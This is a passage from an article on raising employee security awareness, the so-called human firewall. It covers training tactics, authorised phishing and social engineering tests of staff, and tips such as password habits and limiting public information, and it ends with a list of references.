regular attendees who have the potential to become champions within the different work groups and who can later on help educate the other employees in their group. Secondly, you can try to bring in outside security professionals as they are usually eager to get CPEs (continuing professional education) credits, even more if you add some goodwill gesture. The local security pros may present security issues or discuss security with your employees. Thirdly, you should provide your employees information on maintaining Internet safety at home. Such discussions are always well-attended, even more so if you show them something relevant to them such as how to keep kids safe at home. The information must really affect them personally and they must find it relevant to make them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics would be well-accepted. Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office, more informal settings are also beneficial. The point here is that it is important to show them that you are pondering over their problems and attempting to remedy them, in this way they can understand and help with your concerns as well. Fifthly, the old way of hanging posters on the wall and dispersing newsletters can also be efficient. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter would be beneficial if it is interesting and relevant. Tips are usually not interesting and relevant as they are self-serving unless they provide some advice on safety at home which automatically makes them relevant. Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing. Seventhly, create a security mentoring/tutoring option. It is possible that nobody sign up for it but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions and would help in pinpointing gifted employees as regards to security awareness and would help shape a champion among your employees who would educate the others during the course of work. Eightly, you should offer your employees ride-alongs whereby you give them the opportunity to take a look at how the IT or security program actually looks like from the inside. The opposite should be done as well – making IT and security staff take a glimpse of how a day in the workplace of the employees looks like may also be useful. Finally, you should strive to create an environment of teamwork as it is proven that good teamwork has several positive features that come with it, such as: Better problem solving capabilities Quicker completion of tasks Competition which leads personnel to excel at what they do Bringing a combination of different unique qualities on the table may lead to better efficiency in the employees’ decision-making (references as regards these four features can be found at the bottom of the article) As Henry Ford once said “Coming together is a beginning. Keeping together is progress. Working together is success.” Testing the human firewall Testing the human firewall is easy so you can effortlessly track the company’s progress. The first and most employed way to test the human firewall is through written tests which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to fake a phishing campaign against your company, do the attack yourself or hire external security professionals to raise the bar even higher. Below are 3 sample questions that may be used in multiple-choice tests and 3 open questions that require written answer. Similar questions can be used when testing your personnel’s security awareness. What are some important tips when it comes to improving the human firewall? Simple labels that classify data as protected and unprotected such as “confidential” and “public” are a great place to start. Prohibiting password reuse and teaching the human firewall good password habits is crucial. The security staff has to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will aid the security staff in assessing the efficiency of their security programs, on the other hand. When reporting the results from security awareness tests, it is preferable to share them either anonymously or statistically. Though, if negative trends arise from particular employees or groups of employees, share those results with the proper persons and attempt to solve those issues without putting any blame on the people who fall behind with their security education. Teach employees not to store any company data on their smartphone Teach personnel not to connect USB drives, external hard disks or any writeable media to the workplace computer To reduce social engineering attacks against your employees, limit the information that can be gathered about your employees during the reconnaissance stage of the attack (this involves educating them not to divulge too much about information about themselves in the public domain) Remove any organization charts which reveal the employees names, job positions and photos from the company’s public website. Teach the personnel to handle external contacts properly through systematic training. Teach the personnel not to respond to accusations instantaneously but to turn to colleagues, legal staff, etc. before handling complaints. Teach personnel to limit the information they provide in social networks and other public domain sources such as Facebook. Conclusion It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide. Their success varies depending on factors such as the preliminary awareness of the factors, the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall involve modifying strategies that are already taking place in the companies such as transforming the type of information delivered to employees into a way that makes it relevant to the employees and that makes it affect them personally or transforming posters and newsletters in a way that excludes any tips and includes anecdotes and metaphors which will encourage the employees to read these advices and ease them in remembering the rules, whereas some involve a totally new strategy for some companies – like performing ride-alongs so the IT staff can better understand the other employees and vice-versa. We have also seen that testing the results from such security awareness education does not take a lot of effort but it is highly valuable as it can reveal the weak spots or the weakest links of your human firewall. Finally, we have provided some advices that resolve relatively recent issues that have emerged as regards to the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is a one possible solution to the BYOD problem that has emerged only recently. References: Richard O’Hanley, James S. Tiller and others, ‘Information Security Management Handbook, 6th edition, Volume 7? Munir Kotadia, “‘Human firewall’ a crucial defence: Mitnick”, Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet Laneye, ‘Managers under attack’, Available at: Social Engineering - Managers under attack Business Wire, ‘New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013?, Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire University of California, MERCED, ‘Security Self-Test: Questions and Scenarios’, Available at: Security Self-Test: Questions and Scenarios | Information Technology Ken Hess, ‘The second most important BYOD security defense: user awareness’, Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). “A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria”. Personnel Psychology 61 (2): 273–307. Hoegl, Martin, and Hans Georg Gemuenden (2001). “Teamwork Quality and the Success of Innovative Projects: a Theoretical Concept and Empirical Evidence”.Organization Science 12 (4): 435–449 By Ivan Dimov|January 24th, 2014 Sursa: Improving the Human Firewall - InfoSec Institute
×
×
  • Create New...